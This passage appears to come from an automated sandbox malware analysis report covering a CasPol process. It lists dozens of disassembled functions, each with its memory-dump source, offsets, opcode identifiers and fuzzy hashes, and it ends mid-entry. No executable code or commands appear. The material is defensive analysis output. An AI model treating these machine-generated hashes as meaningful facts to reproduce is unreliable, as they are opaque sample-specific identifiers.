                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c431278d57ac060ad49623e41f3a8c857ae15a3341ea99fc84c13f1322b62a0
                                  • Instruction ID: 8366c6869a80c9b47d12236845fed235af6af4bfdc533e0ad606bd478ea34dca
                                  • Opcode Fuzzy Hash: 3c431278d57ac060ad49623e41f3a8c857ae15a3341ea99fc84c13f1322b62a0
                                  • Instruction Fuzzy Hash: FB528E30B102148FDB04EBB8C498A6DBBF6AF89315F19C569D505DB3A6DB38DC42CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C2992 Relevance: .7, Instructions: 680COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 080ac5eb3b34eb637a58b12214de29bcce581647a6b2242f74c16e77e5aa5b35
                                  • Instruction ID: 03a992613fdaf64453a3b8ff140bbd066e2773e82530346cb303389cd53d7855
                                  • Opcode Fuzzy Hash: 080ac5eb3b34eb637a58b12214de29bcce581647a6b2242f74c16e77e5aa5b35
                                  • Instruction Fuzzy Hash: 55721974E002698FCB65DF24C884B9DBBF5AF84344F0486D9D509AB345DB74AEC28F86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C29A0 Relevance: .7, Instructions: 678COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd20efc18776dbb72b1528d18b65b718eb48aeca2a2a05c88ee79c1dfd6a0cf1
                                  • Instruction ID: 798a4c70a3a96f633fbcb53d928e927e5ba929e3f57d5dda0b97127e395c015a
                                  • Opcode Fuzzy Hash: dd20efc18776dbb72b1528d18b65b718eb48aeca2a2a05c88ee79c1dfd6a0cf1
                                  • Instruction Fuzzy Hash: 4F721974E002298FCB65DF24C894B9DBBF5AF84344F0486D9D509AB345DB74AEC28F86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F898 Relevance: .6, Instructions: 637COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 08f263891374986c64900d610230dbaae8506314b4dca359632dbf4f98b0a52b
                                  • Instruction ID: 94868b265c283c9a0f9acd76ac8ea7d4a8110fd1010dcccb0a326734f02f000b
                                  • Opcode Fuzzy Hash: 08f263891374986c64900d610230dbaae8506314b4dca359632dbf4f98b0a52b
                                  • Instruction Fuzzy Hash: 80F17E30B042059FDB04DBB8C4A4BADB7F6BF84354F258569E505DB3A6EB38DD028B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20378B44 Relevance: .6, Instructions: 584COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb1dae9e6de9eb5ab2fdbf5c91e2f6c08518da81dbfb25a497465a59ea8b2cd8
                                  • Instruction ID: 66136b553521090b64bde83ee13b4be616008cbc6100729260926a99279b1b69
                                  • Opcode Fuzzy Hash: fb1dae9e6de9eb5ab2fdbf5c91e2f6c08518da81dbfb25a497465a59ea8b2cd8
                                  • Instruction Fuzzy Hash: A632D154E482818DE72692A8459474C3FA29B9F318F9EC3D7C0A58F6F7C77C89878352
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037D1C8 Relevance: .5, Instructions: 471COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb61bb64d4b741aae06e0d4effbe344792085b530a8dcc79dcef74a64da821f7
                                  • Instruction ID: 39711ba3b389ff71ac63c9e0ece3709b98e538c45ead873e23f2d16793ce6ce0
                                  • Opcode Fuzzy Hash: eb61bb64d4b741aae06e0d4effbe344792085b530a8dcc79dcef74a64da821f7
                                  • Instruction Fuzzy Hash: 5BF16170B002149FCB04EBB9C49476EBBF6AF88354F158569E506DB395EF38DD028B92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C37AE Relevance: .5, Instructions: 467COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ea48e20460f4676437c526afe2def7342f3800e8626c9314686ee058454f4d7
                                  • Instruction ID: e90c50de725452acc1d94520aac0ed3cb624771e0ab723f41c855570f1fcbb9d
                                  • Opcode Fuzzy Hash: 0ea48e20460f4676437c526afe2def7342f3800e8626c9314686ee058454f4d7
                                  • Instruction Fuzzy Hash: C1322474A152298FCB61DF28C988A99BBF5FB48324F14C1DAE80DA3754EB315E91DF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C3982 Relevance: .4, Instructions: 407COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 735bd95553abbda6d798a1208dce34bf4cec215ebd4fdf99b005f61f287e5932
                                  • Instruction ID: 46111b81331d77158cd6f9175e6679e0c10d7f23afe895766d087b7fd6ee0010
                                  • Opcode Fuzzy Hash: 735bd95553abbda6d798a1208dce34bf4cec215ebd4fdf99b005f61f287e5932
                                  • Instruction Fuzzy Hash: 9C222474A152298FCB61DF28C988A99BBF5FB48324F14C1DAE80DA3754EB315E91DF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037B738 Relevance: .3, Instructions: 346COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff343ee6e2c0804cf673dc648cbd31e08f850e913a83423a301864322453fa76
                                  • Instruction ID: 423cc73b83d9def371c46f1ec5c5a91157c66c25b5c703b586e7e7ec91edb02b
                                  • Opcode Fuzzy Hash: ff343ee6e2c0804cf673dc648cbd31e08f850e913a83423a301864322453fa76
                                  • Instruction Fuzzy Hash: 52D15A74E002098FEB14DBA8C484B9DB7F1EB49314F62C526E915EB366DB38DD81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C3B8F Relevance: .3, Instructions: 337COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 98e373f45191a056cecdfa58f8bdf5dfa10339ad4bed5589815a5f501b5a167d
                                  • Instruction ID: 69f23d56eb581db238db5637e403da9d783aae012077ff248aa1f3d87de933f2
                                  • Opcode Fuzzy Hash: 98e373f45191a056cecdfa58f8bdf5dfa10339ad4bed5589815a5f501b5a167d
                                  • Instruction Fuzzy Hash: A0022574A152298FDB61DF28C988A98BBF5FB48324F1481D9E80DA3754EB315F91DF01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C15A0 Relevance: .3, Instructions: 336COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d8489e7c94500c088acbc691ca264d0cef087d8a50a075947e6d15eb3238c53
                                  • Instruction ID: 5560c1930f2a9f8b8679a2271295e0764651c353b6c3115a6c3da5fdfbdae6f7
                                  • Opcode Fuzzy Hash: 7d8489e7c94500c088acbc691ca264d0cef087d8a50a075947e6d15eb3238c53
                                  • Instruction Fuzzy Hash: EFC1DFB4F002558FD705AB78C454BAE7BB6AF89304F24446ED446DB3D1DA34E881CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037B71C Relevance: .3, Instructions: 326COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce132b28db441d9f31d16a24a6238aae803f91e6b679b7a987f14c561d933e57
                                  • Instruction ID: 19a928bfc8f5f2482f744bacfb2b2cdfe742f74083979aef295537bfd00ee436
                                  • Opcode Fuzzy Hash: ce132b28db441d9f31d16a24a6238aae803f91e6b679b7a987f14c561d933e57
                                  • Instruction Fuzzy Hash: 17D15B74E002098FDB10DBA8C484B9DB7F1EB49314F26C526E915EB366D738DD81CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20374DB0 Relevance: .3, Instructions: 300COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b35ab7d00d25f216776d77e8aa752e192afd1fb8deb7f786599862457466c272
                                  • Instruction ID: 28b7870d24c17e894737cec7ccdb16c4a499f317deaf412c13d33c49e63e6028
                                  • Opcode Fuzzy Hash: b35ab7d00d25f216776d77e8aa752e192afd1fb8deb7f786599862457466c272
                                  • Instruction Fuzzy Hash: 0FA14935E002199BDB18EBB9C45069EB7F6AF88344F65852CD405EB395EF79DC02CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037F310 Relevance: .3, Instructions: 296COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee1f6530034b8663f516b4e71bc0e1032c01b4356a9197948472d43b06215ee7
                                  • Instruction ID: bb3cf801a3a2d34c68509f7348bead44d849478132dd20547992632f6fefdc26
                                  • Opcode Fuzzy Hash: ee1f6530034b8663f516b4e71bc0e1032c01b4356a9197948472d43b06215ee7
                                  • Instruction Fuzzy Hash: 13B16C30B002259FDB44EBB4C898B5DB7F6AF88364F15C628E115DB2E5DF39D8418B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037B240 Relevance: .3, Instructions: 251COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb23dc498bfa1047161a358d095dbc2b7dd67c4b5c572e603daf423aec9a89f4
                                  • Instruction ID: b37b495bcb249a6704dbe132f546b25e19d36ce0e8546f7b85face67c23b51e8
                                  • Opcode Fuzzy Hash: cb23dc498bfa1047161a358d095dbc2b7dd67c4b5c572e603daf423aec9a89f4
                                  • Instruction Fuzzy Hash: 3F912970F002089BDB14DBF8C894B9DBBF2AF85364F15C529E509DB3A6DB38E8418B51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203735A5 Relevance: .2, Instructions: 246COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0364663e6be170d93d7a49bfdef19a763bc777a70c166a770b357c2b32591e7d
                                  • Instruction ID: e9cf1b78e0ec7cdd16f7ce875e22a4774e8f73a2f379d50e319517111f825148
                                  • Opcode Fuzzy Hash: 0364663e6be170d93d7a49bfdef19a763bc777a70c166a770b357c2b32591e7d
                                  • Instruction Fuzzy Hash: 4F91F475E452449FDB05CBF8C890BDEBBF1AF89300F15846AD105EB2A1DA349D09CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037B224 Relevance: .2, Instructions: 237COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6848f49508cf205cf09ca2cecf295c683913b8ad28f42a7349ab37f6dd49e5fb
                                  • Instruction ID: 1244cdb5cffe5a5fcac899d5b588e627ccd1293a35490f46754e580ec953be61
                                  • Opcode Fuzzy Hash: 6848f49508cf205cf09ca2cecf295c683913b8ad28f42a7349ab37f6dd49e5fb
                                  • Instruction Fuzzy Hash: 51912970F002049BDB14DBB8C894B9DBBF2AF86324F15C559E505DB3A6DA38E8518B51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20373708 Relevance: .2, Instructions: 231COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d15706c3ac4c24b66fc8fc674e25aedd0e50e155a8b99206282d46d70f553640
                                  • Instruction ID: ef66dddb54f11f76bc1a78a7691bb268e67d758d01af31cca8b288825622b255
                                  • Opcode Fuzzy Hash: d15706c3ac4c24b66fc8fc674e25aedd0e50e155a8b99206282d46d70f553640
                                  • Instruction Fuzzy Hash: 7A81D271F002159FDB09DBB8C890AAEBBF2AFC8250F15802DD506EB390DE349D05CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037EA00 Relevance: .2, Instructions: 228COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7993793dfad6829c301ad9956a5f50f0a308f3c2c7363da63ec8d7a037d3c929
                                  • Instruction ID: 843d3996f69bc8e2ba1c453b4ebd3aed23a2a2a6443c8289cbfab6669f5eeaff
                                  • Opcode Fuzzy Hash: 7993793dfad6829c301ad9956a5f50f0a308f3c2c7363da63ec8d7a037d3c929
                                  • Instruction Fuzzy Hash: FB816E34A042159FDB05DBB9C494AADBBF2AF88314F15C569E405EF3A1DB38EC41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203732E0 Relevance: .2, Instructions: 226COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bba1c2c865e01a62374e18fa18aba338e8c03f8885f79b963760eaee30dae4df
                                  • Instruction ID: 7c19bb2476f593e2f1b8a148a56e4d6b9c08b55d907fbd26800ed3848d8c3d40
                                  • Opcode Fuzzy Hash: bba1c2c865e01a62374e18fa18aba338e8c03f8885f79b963760eaee30dae4df
                                  • Instruction Fuzzy Hash: B371F730B883948FE716D7B9C85476E3BF5AF85204F1684AAD04ADB3A2DE29DC058752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20375F90 Relevance: .2, Instructions: 217COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d22e2609104f7092f9ae7bd34d321566cce5a113c7d2164a87bc4b94d6bf122f
                                  • Instruction ID: cee816339c9ade16a40e73ad881f618094412699a8650d826020d453de628440
                                  • Opcode Fuzzy Hash: d22e2609104f7092f9ae7bd34d321566cce5a113c7d2164a87bc4b94d6bf122f
                                  • Instruction Fuzzy Hash: 5971B575F042548FCB45DBB8C854BADBBF5AF89310F15C0AAD509EB392DA34AD01CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20374D50 Relevance: .2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 64934ca220d21b2867dff5d4feacceda009c4d3bfe28676d312b23ca867d87fa
                                  • Instruction ID: 01d223650351bd279fbbb0a66735a9deda4f2a2cf8d718219dc1517d47468f9a
                                  • Opcode Fuzzy Hash: 64934ca220d21b2867dff5d4feacceda009c4d3bfe28676d312b23ca867d87fa
                                  • Instruction Fuzzy Hash: CC61B031E003149FDB15DBB9C45069EBBF6AF88344F258528D405EB3A5EB78EC02CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20373BD0 Relevance: .2, Instructions: 193COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd50b838d61f0826a150efdaec3e6fd8092e9be09aca634b785af43e55c58346
                                  • Instruction ID: d7070d2d35d8a52c668e0aadfb0a279baa266ac3649937e00b09e932ef4f4413
                                  • Opcode Fuzzy Hash: cd50b838d61f0826a150efdaec3e6fd8092e9be09aca634b785af43e55c58346
                                  • Instruction Fuzzy Hash: C661F370A443849FEB219BB8C8D4B5DBBF29F81314F11C61DE106AB7A1DBB95C048B62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20375ED4 Relevance: .2, Instructions: 181COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d7e12a56da51b4cab4fb73d05648658db05b7ba5c922cb06874abcfb9a565d5
                                  • Instruction ID: 231847506e55a7e5efd816b05a3db68bb3a101d1828afe6bf4e7c623bf531f63
                                  • Opcode Fuzzy Hash: 7d7e12a56da51b4cab4fb73d05648658db05b7ba5c922cb06874abcfb9a565d5
                                  • Instruction Fuzzy Hash: 90619574B083858FD706DBB8C854B5D7FF1AF8A304F1AC5AAD405EB2A2DA349C45CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037D8C8 Relevance: .2, Instructions: 181COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2fb3a0f0c8012e7108f59bb3e308cd21ba7964c7e781155b8896d0aa3211109
                                  • Instruction ID: 6fab328a20c5534eaa4f8b9e1ee17afa5c6290bbfad42ca676b9f5b96bb8cc8f
                                  • Opcode Fuzzy Hash: a2fb3a0f0c8012e7108f59bb3e308cd21ba7964c7e781155b8896d0aa3211109
                                  • Instruction Fuzzy Hash: 1C618E30B002158FCB14EBB8C498AAD77F6FF88355B258479E50ADB3A5DF399C018B52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 203742E8 Relevance: .2, Instructions: 179COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2fe58288aca8ed011d3c7e6cb6c7d2f689a006499cd897edbbba4da81d4e50a7
                                  • Instruction ID: b1774654555af4f20225b4df6e43b10aefdc1cb5d8513cb02f3b0bfcc003e47c
                                  • Opcode Fuzzy Hash: 2fe58288aca8ed011d3c7e6cb6c7d2f689a006499cd897edbbba4da81d4e50a7
                                  • Instruction Fuzzy Hash: 8B51E635F042559FDB05DBB8C850ABE7FF6AF89210F1980A9E505DB3A1DE389D01CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1F9C8398 Relevance: .2, Instructions: 162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5896660516.000000001F9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F9C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_1f9c0000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28cf167d2a54a758e9ff38f1c02c93604afaeb45d58df5335fc45427a1a6d43f
                                  • Instruction ID: 2932949391d805a3d7ca0b5814fe18857afa92d70c066c9aae34df36f9120e14
                                  • Opcode Fuzzy Hash: 28cf167d2a54a758e9ff38f1c02c93604afaeb45d58df5335fc45427a1a6d43f
                                  • Instruction Fuzzy Hash: B051D231B483518FD702EB78980875E3BF69F89704F0584BAD608DF392EA35DC0587A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20374B30 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c65adad49281396179c606bc04b6e819cdec70a73a576c466f6d346087e9a33
                                  • Instruction ID: 002a6d2f649087347dfc138c83e2c1ab5942da992e0aaa31c9030ab7ccbb03f4
                                  • Opcode Fuzzy Hash: 7c65adad49281396179c606bc04b6e819cdec70a73a576c466f6d346087e9a33
                                  • Instruction Fuzzy Hash: 11518F31F002249FCB14EBB8C49869DB7F6AF88365B258538D506EB355DF39EC428B52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 20373BBF Relevance: .2, Instructions: 151COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5072f934e583e1c8a9703438a63cfcf8f10efe3b3ad83ce6989d49f4f5cbae0e
                                  • Instruction ID: d50fe907d9ffc9f4a9dba37dc1da3954a8a08da4f855c2f196059d37021d2322
                                  • Opcode Fuzzy Hash: 5072f934e583e1c8a9703438a63cfcf8f10efe3b3ad83ce6989d49f4f5cbae0e
                                  • Instruction Fuzzy Hash: 17519230E482805EDB7487BCC8E4B5ABAE29F85214F25C51DE2579B7E1DBB9AC008761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037565C Relevance: .2, Instructions: 150COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e3f5dde04a289f45467e2edd6823a05c6a89efdaa5a4df7fe770933feb32044
                                  • Instruction ID: da42381dc65be499d3ab5dfc5e14f17325bdc78ff51bd0fe814b959d1194819b
                                  • Opcode Fuzzy Hash: 7e3f5dde04a289f45467e2edd6823a05c6a89efdaa5a4df7fe770933feb32044
                                  • Instruction Fuzzy Hash: 4A514A35A00219DFDB58CFA8C494A9EBBF6BF88300B258529D406EB355DB74A842CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037D169 Relevance: .2, Instructions: 150COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3fa14e08666d9768bfc7abffe4b6f3d6fad7d11486914fd8e198e77cfad516ad
                                  • Instruction ID: 74c089b92f282f00df62e51945a21294de01db76a8f13fe90dd353db1f31ecee
                                  • Opcode Fuzzy Hash: 3fa14e08666d9768bfc7abffe4b6f3d6fad7d11486914fd8e198e77cfad516ad
                                  • Instruction Fuzzy Hash: A5519030B002558FD755DBB8C49066EBBF2EF85314F19C469D509DB292EB38EC02CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 2037D8C4 Relevance: .1, Instructions: 142COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.5904294250.0000000020370000.00000040.00000800.00020000.00000000.sdmp, Offset: 20370000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_20370000_CasPol.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3e117a8e8563bac402fed5409c578aefdc28ba2238b9ad1ccde7e01f26946ec
                                  • Instruction ID: 0aae5fa124de2ed9e1ecca0687771942617cc208df499298594e16ebaa639bad
